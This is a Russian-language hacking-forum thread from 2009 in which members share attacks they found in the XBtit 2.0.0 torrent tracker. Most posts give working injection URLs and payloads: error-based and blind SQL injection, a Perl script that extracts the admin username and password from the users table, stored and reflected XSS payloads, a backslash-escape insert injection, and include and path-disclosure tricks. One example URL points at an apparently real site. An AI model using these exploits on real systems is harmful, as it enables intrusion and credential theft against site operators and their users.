Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
13.08.2009, 08:22
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Торрент трекер XBtit
Сёдня начал рыться в исходниках.
И так.
Было иследованно на:
Xbtit 2.0.0
Раскрытие путей.
http://target.com/index.php?page=signup&act=signup&returnto[]=
Уязвим GET параметр returnto.
PHPSESSIONID раскрытие путей.
В куках
XSS
http://target.com//"><script>alert(document.cookie);</script>
- Пассивная
Оло, через ошибку можно =\
/index.php?page=admin&user=123456+or(1,1)=(select+c ount(0),concat((select+database()+from+information _schema.tables+limit+0,1),floor(rand(0)*2))from(in formation_schema.tables)group+by+2)--+&code=1234
/index.php?page=users&order=flag+or(1,1)=(select+co unt(0),concat((select+database()+from+information_ schema.tables+limit+0,1),floor(rand(0)*2))from(inf ormation_schema.tables)group+by+2)--++&by=ASC
PHP код:
...
if (isset($_GET["order"]))
$order=htmlspecialchars($_GET["order"]);
else
$order="joined";
...
$query="select prefixcolor, suffixcolor, u.id, $udownloaded as downloaded, $uuploaded as uploaded, IF($udownloaded>0,$uuploaded/$udownloaded,0) as ratio, username, level, UNIX_TIMESTAMP(joined) AS joined,UNIX_TIMESTAMP(lastconnect) AS lastconnect, flag, flagpic, c.name as name, u.smf_fid FROM $utables INNER JOIN {$TABLE_PREFIX}users_level ul ON u.id_level=ul.id LEFT JOIN {$TABLE_PREFIX}countries c ON u.flag=c.id WHERE u.id>1 $where ORDER BY $order $by $limit";
/index.php?page=torrents&active=2&order=speed+or(1, 1)=(select+count(0),concat((select+database()+from +information_schema.tables+limit+0,1),floor(rand(0 )*2))from(information_schema.tables)group+by+2)--++&by=ASC
Ещё нашёл 
Код:
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# xbtit Torrent Tracker SQL INJECTION EXPLOIT #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Blog : www.Ctacok.ru #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "# Hello HAXTA4OK, mailbrush (Thanks) #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)";
$doc = get($host.$path."index.php?page=torrents&active=2&order=speed".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
}else{
print "\n My name is Fail, Epic Fail... \n"
}
Активная XSS:
index.php?page=usercp&do=user&action=change&uid=В аш уид. (Кароче change profile в My panel).
Меняем Avatar(Url) на:
jav ascript:alert();%00.gif
// Здесь этот пробел отфильтровал форум. Берём здесь http://ha.ckers.org/xss.html#XSS_Embedded_tab
Как бы надо хоть как javascript заменять на что-то подобное
Суть такова, что в конце обязательно нужен .gif,.jpg,.bmp или .png
Но если делать в <IMG src='javascript:alert();.gif'>
То код выполняться небудет, обычным нулл байтом прокатило
Вообшем в модуле форум (не смф, а родной Xbtit'овский) при создании темы / сообщения, XSS срабатывает
Надо что-бы торренты были открыты для публичного просмотра )
Последний раз редактировалось Ctacok; 14.06.2010 в 19:31..
|
|
|
13.08.2009, 09:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Требуются права админа 
SQL-inj
index.php?page=admin&user=2&code=8355071'&do=prune u
SQL-inj
Наврал , права пользователя нужны
index.php?page=allshout&sid=1'&edit
index.php?page=allshout&sid=1'&delete
уязвимый код :
Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool
$sql = "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
пример :
Код:
http://lampmaster.dk/index.php?page=allshout&sid=1'&edit
решение проблемы:
Код:
$sid = isset($_GET["sid"])?(int)$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool
$sql = "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
index.php?page=allshout&sid=1+and+substring(versio n(),1,1)=5/*&edit
Раскрытие путей
если создан хоть один топик в форуме
index.php?page=forum&action=viewforum&forumid[]=
index.php?page=forum&action=viewtopic&topicid[]=
Последний раз редактировалось HAXTA4OK; 15.08.2009 в 18:32..
|
|
|
|
13.08.2009, 11:04
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
что то в реализации затух видать какие то фильтры там стоят
Покажи уязвимый код.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
13.08.2009, 11:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool
$sql = "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
$conn = his_getDBConnection(); # establishes the connection to the database
$results = mysql_query($sql, $conn);
что посмотрев его я задумался если тут уязвимость?хотя order by проходит , и в итоге дает мне 5 столбцов |
|
|
|
13.08.2009, 11:17
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Какой запрос пытаешься передать? Посмотри фильтруется ли выше $_GET["sid"], или вообще массив $_GET.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
13.08.2009, 11:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
про sid
if (isset($_GET["sid"])) {
$sid = intval($_GET["sid"]); # getting shout id (sid)
но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]);
нету не фильтрует
3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete =>
index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete
мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп
Последний раз редактировалось HAXTA4OK; 13.08.2009 в 11:45..
|
|
|
|
13.08.2009, 20:41
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от HAXTA4OK
про sid
if (isset($_GET["sid"])) {
$sid = intval($_GET["sid"]); # getting shout id (sid)
но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]);
нету не фильтрует
3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete =>
index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete
мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп intval()- Убирает все слова и т.п. из GET sid.
т.е. только цифры.
PS.
В асю напиши, у меня там кое где есть исчо одна бага.
|
|
|
|
14.08.2009, 09:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
по сути инклуд)))
при register_glodals = on
index.php?page=recover&THIS_BASEPATH='
PHP код:
include("$THIS_BASEPATH/include/security_code.php");
Qwazar глянь плиз и можно ли его реализвоать?
index.php?page=admin&user=2&code=835507&do=logview &THIS_BASEPATH=1'
PHP код:
include("$THIS_BASEPATH/include/offset.php");
index.php?page=viewnews&THIS_BASEPATH='
Последний раз редактировалось HAXTA4OK; 15.08.2009 в 16:19..
|
|
|
|
16.08.2009, 20:00
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Расскрытие путей: /ajaxchat/sendChatData.php
Уязвимый кусок кода:
PHP код:
if (!ini_get('register_globals')) {
extract($_POST, EXTR_SKIP);
}
$name = $n; # name from the form
$text = $c; # comment from the form
$uid = $u; # userid from the form
Если не найден $_GET $_POST $_COOKIE n или c или u, выскакивает Notice, мол, переменная не найдена.
Код:
Notice: Undefined variable: X in [PATH]
SQL-инъекция, причем очень хитромудрая После выполнения запроса смотрим в чат и видим юзера, бд, версию.
Код:
/ajaxchat/sendChatData.php?n=123\&c=,concat_ws(0x3a,user(),database(),version()),7)/*&u=2
Если не работает GET'ом, попробуйте POST'ом. Почему? Смотрите ниже, там где постинг от другого юзера.
Уязвимый кусок кода:
PHP код:
//смотрим предыдущий код, откуда берутся переменные
//бажный мегафильтр
$name = str_replace("\'","'",$name);
$name = str_replace("'","\'",$name);
$text = str_replace("\'","'",$text);
$text = str_replace("'","\'",$text);
$text = str_replace("---"," - - ",$text);
$name = str_replace("---"," - - ",$name);
//сама ф-ция записи в БД
function addData($name,$text,$uid) {
include("../include/settings.php"); # getting table prefix
$now = time();
$sql = "INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES ('".$now."','".$name."','".$text."','".$uid."')";
$conn = getDBConnection();
$results = mysql_query($sql, $conn);
if (!$results || empty($results)) {
# echo 'There was an error creating the entry';
end;
}
}
Т.е. получается, что бажный фильтр экранирует кавычки в переменных $name, $text. Но это не проблема, т.к. слеш не экранируется. При запросе на сайт
Код:
/ajaxchat/sendChatData.php?n=NAME\&c=,concat_ws(0x3a,user(),database(),version()),2)/*&u=2
запрос в базу выглядит таким образом:
Код:
INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES
('1234567890','NAME\',',concat_ws(0x3a,user(),database(),version()),2)/*','2')
Вроде, разукрасил, как мог... Но если еще непонятно, объясню - фильтр НЕ фильтрует бекслеш, т.е. \. Если в конец поля NAME, т.е. в GET/POST - "n"" вставить бекслеш, получится, что он экранирует кавычку и текст mysql-поля NAME будет считаться до тех пор, пока не будет найдена кавычка. Она найдена - открывающая кавычка поля TEXT. Другое поле должно быть отделено запятой от предыдущего, поэтому и запятая в GET/POST поле "c". После запятой идет содержимое поля text, мы подставляем то, что нам нужно, в конкретном случае concat_ws(0x3a,user(),database(),version()). Отделяем запятой следующее поле - uid - пишем любое число, в моем случае - 2. Ну и "/*", чтобы отсечь все лишнее. PS: Поле uid не фильруется, но т.к. оно типа mediumint(9), ничего полезного из него мы не достанем.
Blind SQL-инъекция. Необходимы права админа.
Код:
/index.php?page=admin&user=2&code=134469&do=category&action=edit&id=5 and substring(version(),1)=5
Уязвимый код:
PHP код:
case 'edit':
if (isset($_GET["id"]))
{
// we should get only 1 style, selected with radio ...
$id=max(0,$_GET["id"]);
...
Blind SQL-инъекция. Необходимы права админа.
Код:
/index.php?page=admin&user=2&code=134469&do=style&action=edit&id=1+and+substring(version(),1)=5
Уязвимый код:
PHP код:
case 'edit':
if (isset($_GET["id"]))
{
// we should get only 1 style, selected with radio ...
$id=max(0,$_GET["id"]);
$sres=get_result("SELECT style,style_url FROM {$TABLE_PREFIX}style WHERE id=$id",true);
...
Пассивная XSS:
Код:
/index.php?page=edit&info_hash=HASHID&returnto=index.php";alert(/hello+world/);<!--
Уязвимый код:
Код:
/include/functions.php
PHP код:
function redirect($redirecturl) {
// using javascript for redirecting
// some hosting has warning enabled and this is causing
// problem withs header() redirecting...
print("If your browser doesn't have javascript enabled, click <a href=\"$redirecturl\"> here </a>");
print("<script LANGUAGE=\"javascript\">window.location.href=\"$redirecturl\"</script>");
}
PHP код:
$link = urldecode($_GET["returnto"]);
...
redirect($link);
Постинг в чат от другого юзера:
Код:
http://127.0.0.1/dev/ajaxchat/sendChatData.php?n=NAME&c=TEXT&u=UID
Уязвимый код:
PHP код:
function addData($name,$text,$uid) {
include("../include/settings.php"); # getting table prefix
$now = time();
$sql = "INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES ('".$now."','".$name."','".$text."','".$uid."')";
$conn = getDBConnection();
$results = mysql_query($sql, $conn);
if (!$results || empty($results)) {
# echo 'There was an error creating the entry';
end;
}
Если register_globals = On - GET'ом открывать, в противном случае - POST'ом.
ЗЫ: Сам не ожидал, что столько найду, напишу, о_О.
Последний раз редактировалось mailbrush; 16.08.2009 в 20:16..
|
|
|
|
29.09.2009, 20:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Cоздаeм нагрузку на сервер
При register_globals = On
/index.php?GLOBALS["charset"]=
Последний раз редактировалось HAXTA4OK; 29.09.2009 в 20:40..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид